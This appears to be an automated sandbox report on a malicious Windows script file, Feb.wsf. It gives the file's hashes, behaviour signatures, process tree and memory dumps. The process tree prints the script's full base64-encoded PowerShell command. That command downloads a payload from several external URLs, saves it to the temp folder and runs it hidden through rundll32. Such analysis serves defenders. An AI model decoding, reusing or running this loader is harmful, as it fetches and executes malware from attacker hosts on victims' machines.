306fe3e51a7ccc9ca7f2150671e106673fb2e4249ee38923e31e02a2458d270b

Resubmissions

01/08/2023, 11:40

230801-nsw4nagf4y 8

21/04/2023, 15:45

230421-s7bhqage68 8

21/04/2023, 15:10

230421-skcr9sgc43 8

Analysis

max time kernel
124s
max time network
132s
platform
windows10-1703_x64
resource
win10-20230703-en
resource tags

arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
submitted
01/08/2023, 11:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file/Feb.wsf
Size

290KB
MD5

20e65f83fcbe1f10fb6cf6a29ab55a65
SHA1

a79c622dc5787025ce5c01ae9415c2df413d801a
SHA256

b396786fcbae38eb8d4d481bf05c42cdf8ef34cd2b0a81eb38b2c7c10b7ce3b6
SHA512

9d855840c0ee3d3625844dfe9890baff82248cc0296405a11b88add330763e8410d475467c2d0f79f559dde547e700674a6f2ca75bb70bfac3ca4ebbe128d9ad
SSDEEP

6144:vaG7zwUsHDxO3yHfgrogRcarC6Mq7VFyr0idubJTxPbdj9:Sdd/n0NDdx

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 9 IoCs

flow	pid	Process
4	1772	powershell.exe
7	1772	powershell.exe
11	1772	powershell.exe
14	1772	powershell.exe
16	1772	powershell.exe
19	1772	powershell.exe
23	1772	powershell.exe
26	1772	powershell.exe
28	1772	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1772	powershell.exe
1772	powershell.exe
1772	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1772	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 5088 wrote to memory of 1772	5088	WScript.exe	70
PID 5088 wrote to memory of 1772	5088	WScript.exe	70

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file\Feb.wsf"
1⤵
- Suspicious use of WriteProcessMemory
PID:5088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAYQBkAGEAbQBpAGMAYQBsAGwAeQBVAG4AdABlAHMAdABpAGYAeQBpAG4AZwAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAGMAYQByAGwAYQBkAHYAbwBnAGEAZABhAHQAcgBpAGIAdQB0AGEAcgBpAGEALgBjAG8AbQAvAHQAdgBuAHEAOQAvAEYAUAA0AGkAcQBEAEIAawBSADgAMQAsAGgAdAB0AHAAcwA6AC8ALwBnAHMAcwBjAG8AcgBwAG8AcgBhAHQAaQBvAG4AbAB0AGQALgBjAG8AbQAvAG8AawBTAGYAagAvAHMAVwB3ADcAVQA3AFcATwAsAGgAdAB0AHAAcwA6AC8ALwBtAHIAYwByAGkAegBxAHUAbgBhAC4AYwBvAG0ALwBMADcAYwBjAE4ALwBHAEgAdwAzADEAYQAsAGgAdAB0AHAAcwA6AC8ALwBjAGkAdAB5AHQAZQBjAGgALQBzAG8AbAB1AHQAaQBvAG4AcwAuAGMAbwBtAC8ANgBNAGgAMQBrAC8AOQBEAEYAMABBAFEARwBoAFoAcABqAGMALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwBVAEcAegAxAEcAaAB3AFQALABoAHQAdABwAHMAOgAvAC8AegBhAGkAbgBjAG8ALgBuAGUAdAAvAE8AZABPAFUALwBPADMAQQBrAGIAUwBnACwAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbABsAG8AcwBtAGkAcgB0AG8AcwAuAGMAbwBtAC8AcwBqAG4ALwB3AFUAVwBFAG8AMQBiADEASQB1AFkALABoAHQAdABwAHMAOgAvAC8AbgBhAHkAYQBkAG8AZgBvAHUAbgBkAGEAdABpAG8AbgAuAG8AcgBnAC8AdwBYAGEASwBtAC8AZABWAFoANQBRAGwAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAaQBzAG0AYQBlAGwAaQB0AGUARABlAGYAbwByAGUAcwB0AHMAIABpAG4AIAAkAGEAZABhAG0AaQBjAGEAbABsAHkAVQBuAHQAZQBzAHQAaQBmAHkAaQBuAGcAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAGkAcwBtAGEAZQBsAGkAdABlAEQAZQBmAG8AcgBlAHMAdABzACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA2ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABDAHUAcgBhAHIAZQAuAGQAbwBwAGkAZQByADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAQwB1AHIAYQByAGUALgBkAG8AcABpAGUAcgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgBEAEEASABVAEEAYwBnAEIAaABBAEgASQBBAFoAUQBBAHUAQQBHAFEAQQBiAHcAQgB3AEEARwBrAEEAWgBRAEIAeQBBAEMAdwBBAFQAUQBCAHYAQQBIAFEAQQBaAEEAQQA3AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADUAOwB9AH0A"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1772

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:872

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u4zdo3fy.vul.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/1772-164-0x000002BE45BC0000-0x000002BE45BD0000-memory.dmp

Filesize
64KB

Download
memory/1772-190-0x000002BE45BC0000-0x000002BE45BD0000-memory.dmp

Filesize
64KB

Download
memory/1772-127-0x000002BE45DB0000-0x000002BE45E26000-memory.dmp

Filesize
472KB

Download
memory/1772-126-0x000002BE45BC0000-0x000002BE45BD0000-memory.dmp

Filesize
64KB

Download
memory/1772-124-0x00007FFD2C1B0000-0x00007FFD2CB9C000-memory.dmp

Filesize
9.9MB

Download
memory/1772-142-0x000002BE45BC0000-0x000002BE45BD0000-memory.dmp

Filesize
64KB

Download
memory/1772-125-0x000002BE45BC0000-0x000002BE45BD0000-memory.dmp

Filesize
64KB

Download
memory/1772-165-0x000002BE45BC0000-0x000002BE45BD0000-memory.dmp

Filesize
64KB

Download
memory/1772-163-0x00007FFD2C1B0000-0x00007FFD2CB9C000-memory.dmp

Filesize
9.9MB

Download
memory/1772-172-0x000002BE46BD0000-0x000002BE47376000-memory.dmp

Filesize
7.6MB

Download
memory/1772-121-0x000002BE45C00000-0x000002BE45C22000-memory.dmp

Filesize
136KB

Download
memory/1772-207-0x000002C647380000-0x000002C647810000-memory.dmp

Filesize
4.6MB

Download
memory/1772-249-0x000002C647380000-0x000002C647810000-memory.dmp

Filesize
4.6MB

Download
memory/1772-306-0x000002C647380000-0x000002C647810000-memory.dmp

Filesize
4.6MB

Download
memory/1772-307-0x00007FFD2C1B0000-0x00007FFD2CB9C000-memory.dmp

Filesize
9.9MB

Download